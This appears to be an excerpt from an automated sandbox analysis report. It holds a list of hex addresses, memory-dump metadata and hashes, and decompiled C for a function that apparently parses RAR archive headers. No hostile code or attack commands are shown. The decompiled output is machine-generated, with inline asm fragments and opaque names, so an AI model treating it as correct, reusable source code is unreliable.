                0x00ccd147
                0x00ccd147
                0x00ccd14e
                0x00ccd14f
                0x00ccd150
                0x00ccd155
                0x00ccd158
                0x00ccd158
                0x00cccf3b
                0x00cccf2c
                0x00ccce43
                0x00ccce20
                0x00ccce20
                0x00ccce22
                0x00ccce28
                0x00ccd0d2
                0x00ccd0d2
                0x00ccd0d3
                0x00ccd0d9
                0x00ccd0d9
                0x00ccd0e0
                0x00ccd0e1
                0x00ccd0e2
                0x00ccd0e7
                0x00ccd0ea
                0x00ccd0ea
                0x00ccd0ea
                0x00ccce1e
                0x00ccd0ec
                0x00ccd0ec
                0x00ccd0ee
                0x00ccd15c
                0x00ccd163
                0x00ccd163
                0x00ccd163
                0x00ccd16a
                0x00ccd16c
                0x00ccd172
                0x00ccd173
                0x00ccd61f
                0x00ccd61f
                0x00ccd620
                0x00ccd621
                0x00ccd626
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd0f0
                0x00ccd0f6
                0x00ccd0f6
                0x00ccd0fc
                0x00ccd0fc
                0x00ccd108
                0x00000000
                0x00ccd108
                0x00cccd97
                0x00ccd629
                0x00ccd629
                0x00ccd62f
                0x00ccd631
                0x00ccd637
                0x00ccd63d
                0x00ccd63f
                0x00ccd641
                0x00ccd643
                0x00ccd643
                0x00ccd645
                0x00ccd645
                0x00ccd64e
                0x00ccd64f
                0x00ccd653
                0x00ccd65a
                0x00ccd65d
                0x00ccd65e
                0x00ccd660
                0x00ccd660
                0x00ccd664
                0x00ccd66a
                0x00ccd66c
                0x00ccd672
                0x00ccd674
                0x00ccd67a
                0x00ccd67d
                0x00ccd690
                0x00ccd693
                0x00ccd699
                0x00ccd6ae
                0x00ccd6b3
                0x00ccd67f
                0x00ccd681
                0x00ccd688
                0x00ccd688
                0x00ccd67d
                0x00ccd6b6
                0x00ccd6b6
                0x00ccd6c6
                0x00ccd6cf
                0x00ccd6d0
                0x00ccd6d2
                0x00ccd769
                0x00ccd76b
                0x00ccd776
                0x00ccd776
                0x00ccd778
                0x00ccd77b
                0x00ccd77d
                0x00000000
                0x00ccd76d
                0x00ccd773
                0x00ccd773
                0x00ccd6d8
                0x00ccd6d8
                0x00ccd6de
                0x00ccd6e1
                0x00ccd6e7
                0x00ccd6ea
                0x00ccd6f0
                0x00ccd6f2
                0x00ccd6f8
                0x00ccd6fa
                0x00ccd6fc
                0x00ccd6fc
                0x00ccd6fe
                0x00ccd6fe
                0x00ccd70b
                0x00ccd712
                0x00ccd715
                0x00ccd716
                0x00ccd718
                0x00ccd719
                0x00ccd719
                0x00ccd71d
                0x00ccd723
                0x00ccd725
                0x00ccd727
                0x00ccd72d
                0x00ccd730
                0x00ccd744
                0x00ccd74a
                0x00ccd75f
                0x00ccd764
                0x00ccd732
                0x00ccd732
                0x00ccd739
                0x00ccd739
                0x00ccd730
                0x00ccd725
                0x00ccd783
                0x00ccd783
                0x00ccd783
                0x00ccd78f
                0x00ccd792
                0x00ccd798
                0x00ccd79a
                0x00ccd79c
                0x00ccd7a2
                0x00ccd7a4
                0x00ccd7a4
                0x00ccd7a4
                0x00ccd7a2
                0x00ccd7a9
                0x00ccd7aa
                0x00ccd7ac
                0x00ccd7ae
                0x00ccd7ae
                0x00ccd7b0
                0x00ccd7b6
                0x00ccd7bc
                0x00ccd7be
                0x00ccd7c4
                0x00ccd7c4
                0x00ccd7ca
                0x00ccd7cc
                0x00000000
                0x00000000
                0x00ccd7d2
                0x00ccd7d4
                0x00ccd7d6
                0x00ccd7d6
                0x00ccd7d8
                0x00ccd7d8
                0x00ccd7e8
                0x00ccd7ef
                0x00ccd7f2
                0x00ccd7f3
                0x00ccd7f5
                0x00ccd7f5
                0x00ccd7f9
                0x00ccd7ff
                0x00ccd801
                0x00ccd803
                0x00ccd809
                0x00ccd80c
                0x00ccd81d
                0x00ccd820
                0x00ccd826
                0x00ccd83b
                0x00ccd840
                0x00ccd80e
                0x00ccd80e
                0x00ccd815
                0x00ccd815
                0x00ccd80c
                0x00ccd851
                0x00ccd860
                0x00ccd861
                0x00ccd861
                0x00ccd863
                0x00ccd865
                0x00ccd865
                0x00ccd86b
                0x00ccd86e
                0x00ccd870
                0x00ccd872
                0x00ccd872
                0x00ccd875
                0x00ccd876
                0x00ccd876
                0x00ccd87b
                0x00ccd87e
                0x00ccd882
                0x00ccd882
                0x00ccd883
                0x00ccd885
                0x00ccd88b
                0x00ccd891
                0x00000000
                0x00000000
                0x00000000
                0x00ccd891
                0x00ccd7c4
                0x00ccd897
                0x00ccd897
                0x00000000
                0x00ccd897
                0x00ccc61c
                0x00ccc613
                0x00ccc60a
                0x00ccc5c1
                0x00ccc5c5
                0x00ccc5cd
                0x00000000
                0x00ccc5cf
                0x00ccc5d5
                0x00ccc5da
                0x00ccd8b6
                0x00ccd8b6
                0x00ccd8b9
                0x00ccd8c4
                0x00ccd8ef
                0x00ccd8f0
                0x00ccd8f1
                0x00ccd8f2
                0x00ccd8f3
                0x00ccd8f4
                0x00ccd8f9
                0x00ccd901
                0x00ccd906
                0x00ccd90c
                0x00ccd911
                0x00ccd912
                0x00ccd912
                0x00ccd912
                0x00ccd918
                0x00ccd919
                0x00ccd919
                0x00ccd91c
                0x00ccd922
                0x00000000
                0x00000000
                0x00ccd924
                0x00ccd929
                0x00ccd92c
                0x00ccd92e
                0x00ccd936
                0x00ccd938
                0x00ccd93a
                0x00ccd93f
                0x00ccd942
                0x00ccd948
                0x00ccd94b
                0x00ccd94d
                0x00ccd94d
                0x00ccd94d
                0x00ccd94d
                0x00ccd94b
                0x00ccd950
                0x00ccd95c
                0x00ccd962
                0x00ccd96a
                0x00ccd96f
                0x00ccd970
                0x00ccd975
                0x00ccd975
                0x00ccd975
                0x00ccd975
                0x00ccd979
                0x00ccd979
                0x00ccd97c
                0x00ccd983
                0x00ccd990
                0x00ccd8c6
                0x00ccd8c6
                0x00ccd8c6
                0x00ccd8d0
                0x00ccd8d9
                0x00ccd8de
                0x00ccd8ec
                0x00ccd8ec
                0x00ccd8c4
                0x00ccc5cd

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: d4b068acd048ee1ea847bb278f09f8b58ea5fc478cf2a9b66c62c79b685e0c71
                • Instruction ID: 9513a71df4fbd0dfe97d2f256d5c32a0c80f0c9528ca54dd63b44997ae5840c4
                • Opcode Fuzzy Hash: d4b068acd048ee1ea847bb278f09f8b58ea5fc478cf2a9b66c62c79b685e0c71
                • Instruction Fuzzy Hash: 5CC24B71E086288FDB25CE28DD80BEAB7B5EB84305F1541EED45EE7240E774AE819F40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA2692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E00CA2692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E00CBD870(E00CD1197, _t698);
				E00CBD940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E00CAC223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E00CAC42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E00CAC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E00CAC251(_t698 + 0x24) & 0x000000ff;
						_t333 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E00CAC42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00CA1901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E00CAA96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E00CAC269(_t698 + 0x24);
										_t638 = E00CAC29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E00CAC34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E00CA6E03(0xce00e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00CA6BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E00CA972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E00CAC29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E00CAA8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E00CAC29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E00CAC29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E00CAC251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E00CAC29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E00CAC29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E00CAC251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E00CAC251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E00CAC269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E00CAC29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E00CAC300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E00CB0FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E00CA1EDE(_t685 + 0x1028, _t671);
																		_t466 = E00CAC300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00CC2B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E00CAF749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E00CBD890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E00CAF749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00CC2B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E00CA69E0(_t698);
																		_t484 = E00CC2BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E00CA69F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E00CAF79F();
																	}
																	E00CA1F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E00CAC300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E00CB08B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00CA3CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E00CAC34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E00CA6E03(0xce00e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E00CA6BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E00CAC269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E00CB08B2(E00CAC29E(_t698 + 0x24));
																		}
																		E00CB06E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E00CB0910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E00CAC251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E00CAC29E(_t698 + 0x24);
															_t491 = E00CAC29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E00CAC29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
